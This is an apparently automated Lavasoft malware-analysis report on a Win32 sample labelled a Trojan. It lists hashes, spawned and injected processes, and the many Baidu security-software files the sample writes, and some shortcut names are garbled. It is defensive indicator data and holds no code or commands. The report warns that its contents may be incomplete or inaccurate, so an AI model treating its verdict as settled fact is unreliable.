Gen.Trojan.Heur.JP.bq0aW98Nwnb_6653a00161 – Adaware

Gen:Trojan.Heur.JP.bq0@aW98Nwnb (AdAware), Trojan.Win32.Alureon.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 6653a00161a58061f2e6bc283de8edee

SHA1: 70db6bbf6945e4d9c8088678a710b5b72d9ecd28

SHA256: bc1799830b131d74e3dc0db5bf4b22dd574474926544434e7cfd727d8798b4fb

SSDeep: 12288:HRWNcr8oxn/1CSbCqMPFROvw8Y8KRFe4CO uJyx/VX6WbODE28Ydq9TyoNHTaW5e:gNBI5/VNbOQ2s9TdHe1pb8c

Size: 813662 bytes

File type: EXE

Platform: WIN32

Entropy: Not Packed

PEID: UPolyXv05_v6

Company: AirInstaller

Created at: 2013-12-01 10:08:23

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

F1023_s_30803.exe:780
BaiduHips.exe:3260
BaiduHips.exe:320
netsh.exe:2640
BDKVWsc.exe:2568
BDKVWsc.exe:2668
RegSvr32.exe:2972
RegSvr32.exe:2256
RegSvr32.exe:560
RegSvr32.exe:1232
RegSvr32.exe:2360
bddownloader.exe:2600
bddownloader.exe:3792
G1023_s_70904.exe:3576
%original file name%.exe:716
BaiduSdTray.exe:2844
BaiduAnTray.exe:3824
setup.exe:1056
cacls.exe:1860
MsiExec.exe:548
MsiExec.exe:1968
BaiduAnBugRpt.exe:916
BDASWDeskGuide.exe:228
baiduanTray.exe:3012
BindEx.exe:1568
BindEx.exe:1040
setup.tmp:1976
regsvr32.exe:2652
regsvr32.exe:1520
regsvr32.exe:2920
BDALeakfixer.exe:3188
BaiduAn.exe:3824
BaiduAn.exe:1952
BaiduSdBugRpt.exe:2180
BaiduSdUpdate.exe:2680
BaiduSdUpdate.exe:2228
BaiduAnSvc.exe:3768
BaiduAnSvc.exe:3664
BaiduSdSvc.exe:1500

The Trojan injects its code into the following process(es):

bddownloader.exe:3300
services.exe:724
svchost.exe:1084

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process F1023_s_30803.exe:780 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPatchAgent.dll (3104 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDUDiskGuard.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerXMLScript.dat (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ad.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSd.exe (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\res\InstallWnd.zip (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDCooly.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVMC.rdb (5520 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_customer.xml (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tips.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\TrustAndIso.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDDownLoadProtectPlugin.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsUpdate.exe (37 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ToastLogo.ico (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vcrt.msi (22552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDPerflog.dll (10512 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMStringUtils.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BSRLib.dat (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bdcomproxy.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDLogicUtils.dll (16864 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\811.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (1287722 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\NetService.ini (615 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\baidusdRepair.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRmvDevPlugin.dll (8560 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe (9605 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUProxy64.exe (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTray\TrayPlugin.rdb (18424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDDriverFixer.dll (1281 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMNet.dll (5873 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsIU.dll (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSREng.dll (10136 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\CompatibilityChecker.dll (673 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\bdcomproxy.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMPatchAgent.dll (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\UserDetectionPlugin.dll (5520 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\systemfile.dat (3 bytes)
%System%\config (576 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\806.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe (7385 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\HIPSClient.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWindowsLib.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDPerflog.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\monitor_config.dat (559 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0001.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDKitUtils.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.dll (4992 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\Repair_PluginConfig.xml (411 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVRtp_PluginConfig.xml (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\virus_type.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\bduf.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrayPluginContainerConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\810.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUpdate.exe (33263 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVWsc.exe (13368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\GetSupplyId.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.sys (13168 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavFrame.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect_x64.dll (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0001.sys (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMWindowsLib.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMLog.dll (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDLogicUtils.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrustAndIso.dll (13440 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHips.exe (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanV.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastLogo.ico (12024 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\blacksign.dat (852 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vatl.msi (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\RepairPluginContainerConfig.xml (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSRCore.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVFixerConfigMgr.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\804.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebMonHook.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\InstallCfg.xml (177 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0002.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GameNoDisturb.ini (215 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\uninst.exe (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsIU.dll (1856 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDUDiskGuard.dll (7192 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tuopan.png (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMStringUtils.dll (63 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0001.sys (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDPerflog.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\RtpContainerConfig.xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\806.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMDownload.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDLogicUtils.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\TrustAndIso.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMFrameWork.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDShellExt64.dll (2321 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_customer.xml (75 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\cache_config.dat (469 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMSDWrench.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand.dll (5064 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMFrameWork.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\NetService.ini (1230 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayDldProtect.rdb (3616 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0001.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMPatchAgent.dll (39 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\PrivacyProtect.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\BDMSkin.dll (37727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHips.exe (38495 bytes)
%System%\config\system (2566 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\KVInstallHelper.dll (16424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\white_list.dat (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVUpdate.rdb (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\901.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastImage.png (5 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch.7z (7433 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerLuaScript.dat (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDLogicUtils.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDArKit.sys (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerConfig.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVCached.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMNet.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanH.dll (1856 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdmp.dat (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\updlog.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\kav_verify.dat (677 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\NetService.ini (615 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vcrt.msi (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMSkin.dll (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RtpContainerConfig.xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDownLoadProtectPlugin.dll (16288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVCached.dll (23584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSREng.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\monitor_config.dat (559 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\NetService.ini (615 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerConfig.dat (1 bytes)
%Documents and Settings%\All Users\Desktop\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢.lnk (895 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDArKit.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\dl.dll (14988 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsBugRpt.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonHook.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMDownload.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\systemfile.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vatl.msi (6584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCCallbackBind.dll (39 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\Cooly_PluginConfig.xml (726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSDWrench.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\DesktopToast.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepMgr.dll (12088 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdSvc.exe (27704 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\coolyplugins\CoolyContainerConfig.xml (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVTrayTipsPlugin.dll (6584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMUpdate.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayPullUpWS.rdb (3616 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMScriptVM.dll (1281 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVVirusPlugins.dll (12088 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\KavUpdate.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RepairPluginContainerConfig.xml (228 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\Database\bdmp.dat (32 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\kav_verify.dat (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVRtp_PluginConfig.xml (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanH.dll (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafePlugin.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\uninst.exe (29256 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayPlugin.rdb (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0003.sys (1856 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMPatchAgent.dll (43 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMDbSqlite.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\duilib license.txt (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMLog.dll (43 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDConfig.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTray.rdb (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\TrustAndIso.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CoolyContainerConfig.xml (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\fm.dat (597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DriverManager.dll (8608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\white_list.dat (12088 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsIU.dll (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTips.rdb (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsBugRpt.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUProxy64.exe (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanS.dll (2392 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\900.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Cooly_PluginConfig.xml (726 bytes)
%System%\drivers\bd0003.sys (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\systemfile.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVTrayTipsPlugin.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMBase.dll (7345 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCScriptBind.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\FileMon.dll (21216 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\7z.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\DriverManager.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKitUtils.dll (2392 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\dl.dll (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMUpdate.dll (12104 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKV.rdb (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\DllInject.dll (43 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\iexplore.exe.xml (528 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\809.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\dl.dll (65930 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\smr.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\SearchProtection.rdb (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\tuopan.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDownload.dll (15336 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanM.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0001.sys (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\scan_mgr_config.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt64.dll (15168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\ccesign.dat (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMMsg.dll (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVQuarantine.rdb (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\virus_type.dat (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVCached.dll (1425 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢.lnk (907 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMBase.dll (7345 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMMsg.dll (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.dll (16424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMUpdate.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanM.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMEvents.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\wverify.dat (132336 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand64.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\TrayPluginContainerConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\900.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDConfig.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVRecomm.dll (13122 bytes)
%System%\drivers\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMLog.dll (43 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMReport.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BSRLib.dat (673 bytes)
%System%\config\SYSTEM.LOG (5938 bytes)
%System%\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMBase.dll (32128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCallbackBind.dll (1552 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢\ÃƒÂ¥Ã‚ÂÃ‚Â¸ÃƒÂ¨Ã‚Â½Ã‚Â½ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢.lnk (880 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCScriptBind.dll (32128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PrivacyProtect.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\iexplore.exe.xml (528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect.dll (5520 bytes)
